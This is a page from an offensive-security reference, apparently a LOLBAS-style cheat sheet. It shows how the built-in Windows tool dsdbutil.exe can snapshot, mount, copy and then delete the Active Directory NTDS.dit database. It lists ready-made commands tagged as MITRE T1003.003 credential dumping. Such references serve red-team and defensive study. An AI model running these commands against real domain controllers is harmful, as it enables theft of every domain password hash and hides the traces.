🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / dsdbutil.exe

dsdbutil.exe

Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.

Dump

Snapshoting of Active Directory NTDS.dit database

dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"

dsdbutil supports VSS snapshot creation — MITRE: T1003.003 — Privileges: Administrator

Mounting the snapshot to access the ntds.dit with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`

dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"

Mounting the snapshot with its GUID — MITRE: T1003.003 — Privileges: Administrator

Deletes the snapshot

dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"

Deletes the mount of the snapshot — MITRE: T1003.003 — Privileges: Administrator

Mounting the snapshot identifier 1 and accessing it with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`

dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"

Mounting with snapshot identifier — MITRE: T1003.003 — Privileges: Administrator

deletes the snapshot

dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"

Deletes the mount of the snapshot — MITRE: T1003.003 — Privileges: Administrator